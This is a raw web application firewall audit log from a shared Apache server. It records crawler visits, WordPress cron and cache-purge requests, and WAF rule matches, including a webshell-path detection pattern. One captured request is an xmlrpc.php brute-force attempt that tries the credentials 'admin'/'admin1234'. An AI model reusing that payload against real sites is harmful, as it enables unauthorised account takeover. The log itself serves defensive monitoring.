[severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751301937947550 1192931 (- - -) Stopwatch2: 1751301937947550 1192931; combined=2021, p1=74, p2=1803, p3=0, p4=0, p5=144, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --57aaac11-Z-- --a289386b-A-- [30/Jun/2025:22:15:40.875854 +0530] aGK_NCkSecaCzZdwhdiFVQAAABw 20.171.207.232 44998 192.168.74.40 443 --a289386b-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/Rajasthan-Travel-Guides/js/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a289386b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a289386b-H-- -- Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:404||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751302380640042 6335 (- - -) Stopwatch2: 1751302380640042 6335; combined=4302, p1=91, p2=3948, p3=96, p4=3, p5=163, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7b30582b-Z-- --1912bd77-A-- [30/Jun/2025:22:23:01.759164 +0530] aGLA7WtDMP7N-hHfRPbmtwAAABc 103.185.74.40 65529 192.168.74.40 443 --1912bd77-B-- POST /wp-cron.php?doing_wp_cron=1751302381.5285999774932861328125 HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --1912bd77-C-- --1912bd77-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --1912bd77-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751302381.5285999774932861328125& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751302381739923 19759 (- - -) Stopwatch2: 1751302381739923 19759; combined=6368, p1=136, p2=5155, p3=322, p4=7, p5=748, sr=45, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1912bd77-Z-- --74fce514-A-- [30/Jun/2025:22:23:04.622166 +0530] aGLA7134A3ejDf5wC_invQAAAFI 107.172.243.11 43850 192.168.74.40 443 --74fce514-B-- POST /xmlrpc.php HTTP/1.1 Host: carmictech.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Content-Length: 212 Accept: */* Accept-Encoding: gzip, zstd, deflate, br Accept-Language: ro-RO,ro;q=0.9 Content-Type: application/xml Referer: https://carmictech.com --74fce514-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>admin1234</string></value></param></params></methodCall> -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b8ae8e32-Z-- --af688047-A-- [30/Jun/2025:22:43:42.489992 +0530] aGLFxslXOEafT1CY3KkAAAAAADg 103.211.202.20 57758 192.168.74.40 80 --af688047-B-- GET /server-status?auto HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: deflate, gzip, br, zstd --af688047-F-- HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Length: 1806 Content-Type: text/plain; charset=ISO-8859-1 --af688047-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:auto=& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: server-status Stopwatch: 1751303622484129 5910 (- - -) Stopwatch2: 1751303622484129 5910; combined=3656, p1=80, p2=3093, p3=73, p4=1, p5=408, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --af688047-Z-- --8f07923c-A-- [30/Jun/2025:22:43:42.897331 +0530] aGLFxtnCSrVZBPcRuCIzAQAAACs 20.171.207.232 54866 192.168.74.40 443 --8f07923c-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8f07923c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8f07923c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303622882562 14877 (- - -) Stopwatch2: 1751303622882562 14877; combined=2525, p1=124, p2=2276, p3=0, p4=0, p5=125, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f07923c-Z-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303901565094 810985 (- - -) Stopwatch2: 1751303901565094 810985; combined=2420, p1=153, p2=2029, p3=0, p4=0, p5=237, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --34876672-Z-- --b216596c-A-- [30/Jun/2025:22:48:24.014958 +0530] aGLG3ztLvL5g2y9UeGtY8QAAAAw 103.185.74.40 55662 192.168.74.40 443 --b216596c-B-- POST /wp-cron.php?doing_wp_cron=1751303903.7832961082458496093750 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --b216596c-C-- --b216596c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --b216596c-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=6563, p1=159, p2=6215, p3=186, p4=3, p5=0, sr=61, sw=0, l=0, gc=0||Py scan:10165||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303903996519 18747 (- - -) Stopwatch2: 1751303903996519 18747; combined=6792, p1=159, p2=6215, p3=186, p4=3, p5=228, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b216596c-Z-- --2357085e-A-- [30/Jun/2025:22:48:24.704871 +0530] aGLG4PkIhZl9bYeKNmom7wAAABE 57.141.0.30 55476 192.168.74.40 443 --2357085e-B-- GET /rajasthan-tours-from-jaipur/rajasthan-tours-from-jaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/large.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --2357085e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2357085e-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305491751275 1344243 (- - -) Stopwatch2: 1751305491751275 1344243; combined=6471, p1=85, p2=5515, p3=236, p4=5, p5=546, sr=166, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --42e7725e-Z-- --070cdf00-A-- [30/Jun/2025:23:14:53.340957 +0530] aGLNCG_5qzls-jQQfTMBcQAAAAQ 103.185.74.40 38599 192.168.74.40 443 --070cdf00-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --070cdf00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --070cdf00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305480242333 13099070 (- - -) Stopwatch2: 1751305480242333 13099070; combined=3003, p1=91, p2=2696, p3=0, p4=0, p5=216, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --070cdf00-Z-- --5cc91230-A-- [30/Jun/2025:23:14:53.990674 +0530] aGLNFQMc_C_fNh2qjATxRwAAAB8 20.171.207.232 43356 192.168.74.40 443 --5cc91230-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-agra/aainag/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5cc91230-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5cc91230-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305518428028 13414 (- - -) Stopwatch2: 1751305518428028 13414; combined=2257, p1=81, p2=1833, p3=0, p4=0, p5=342, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --adb6b164-Z-- --b98ea13f-A-- [30/Jun/2025:23:15:18.634745 +0530] aGLNDaFTwUQ6g1_nyFr5ZwAAAB4 103.185.74.40 34145 192.168.74.40 443 --b98ea13f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b98ea13f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b98ea13f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305485274485 33360690 (- - -) Stopwatch2: 1751305485274485 33360690; combined=2686, p1=80, p2=2449, p3=0, p4=0, p5=157, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b98ea13f-Z-- --46129e73-A-- [30/Jun/2025:23:15:18.644868 +0530] aGLNLiCJw31IkD-SP_a0ZgAAABU 47.128.112.222 18686 192.168.74.40 443 --46129e73-B-- GET /rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/https/https/Rajasthan-Travel-Guides/https/Rajasthan-Travel-Guides/images/logo.png HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: image/heif,image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://abhaytravelsindia.digitaltheka.com/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/https/https/Rajasthan-Travel-Guides/https/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php Accept-Encoding: identity Range: bytes=0-499 --46129e73-F-- HTTP/1.1 403 Forbidden -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306324549723 1656803 (- - -) Stopwatch2: 1751306324549723 1656803; combined=8624, p1=171, p2=7933, p3=283, p4=4, p5=232, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5adc807a-Z-- --3f1bf548-A-- [30/Jun/2025:23:28:46.567859 +0530] aGLQVPq-bA86ckeGboN67gAAADo 103.185.74.40 42221 192.168.74.40 443 --3f1bf548-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --3f1bf548-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3f1bf548-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306324512236 2056128 (- - -) Stopwatch2: 1751306324512236 2056128; combined=3439, p1=118, p2=3178, p3=0, p4=0, p5=142, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3f1bf548-Z-- --d756ef17-A-- [30/Jun/2025:23:28:46.595159 +0530] aGLQU9pRgiBdy7JGN8wLTQAAACw 43.134.141.244 57346 192.168.74.40 443 --d756ef17-B-- GET /catering/embed/ HTTP/1.1 Host: byraveshwaracateringservice.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306323959478 2636282 (- - -) Stopwatch2: 1751306323959478 2636282; combined=3244, p1=133, p2=2871, p3=0, p4=0, p5=239, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d756ef17-Z-- --2097dd7b-A-- [30/Jun/2025:23:28:47.745243 +0530] aGLQVnIXvL-LWyQx7k_h0QAAAA8 103.185.74.40 19511 192.168.74.40 443 --2097dd7b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --2097dd7b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2097dd7b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306326782149 963701 (- - -) Stopwatch2: 1751306326782149 963701; combined=4171, p1=268, p2=3717, p3=0, p4=0, p5=186, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2097dd7b-Z-- --1421431f-A-- [30/Jun/2025:23:28:48.164368 +0530] aGLQWNBUnZzfIrlBZvN0uQAAACU 57.141.0.13 57514 192.168.74.40 443 --1421431f-B-- GET /rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Folk-Music-Songs.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --1421431f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078339728 13816 (- - -) Stopwatch2: 1751309078339728 13816; combined=2539, p1=124, p2=2300, p3=0, p4=0, p5=114, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3fd9024b-Z-- --e0013d67-A-- [01/Jul/2025:00:14:38.660547 +0530] aGLbFKaXLCRo8Qw21kmbpAAAAAk 103.185.74.40 44414 192.168.74.40 443 --e0013d67-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e0013d67-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e0013d67-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309076556830 2104156 (- - -) Stopwatch2: 1751309076556830 2104156; combined=2520, p1=106, p2=2268, p3=0, p4=0, p5=145, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e0013d67-Z-- --e743fd62-A-- [01/Jul/2025:00:14:39.495523 +0530] aGLbFw8JLIiTsjmkw06R_QAAAAs 20.171.207.232 50464 192.168.74.40 443 --e743fd62-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/js/images/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e743fd62-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e743fd62-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078969903 1842539 (- - -) Stopwatch2: 1751309078969903 1842539; combined=12304, p1=148, p2=4584, p3=359, p4=7, p5=3804, sr=73, sw=134, l=0, gc=3268 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dd20bd48-Z-- --3376d92b-A-- [01/Jul/2025:00:14:40.993574 +0530] aGLbFsdEQ__eLfsh0hRUsgAAAAM 103.185.74.40 24872 192.168.74.40 443 --3376d92b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3376d92b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3376d92b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078872360 2121820 (- - -) Stopwatch2: 1751309078872360 2121820; combined=2259, p1=84, p2=2025, p3=0, p4=0, p5=149, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3376d92b-Z-- --49257645-A-- [01/Jul/2025:00:14:41.145908 +0530] aGLbF6fYZ8LycUo6QhycCAAAAAo 205.185.122.222 50910 192.168.74.40 443 --49257645-B-- GET /wp-login.php HTTP/1.1 Host: byraveshwaracateringservice.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 --49257645-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 35f_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --13bf4274-Z-- --a7eb6416-A-- [01/Jul/2025:00:21:47.217761 +0530] aGLcw-OwazA7aFZNrK5UfQAAAA4 43.135.145.73 59176 192.168.74.40 80 --a7eb6416-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --a7eb6416-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --a7eb6416-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] 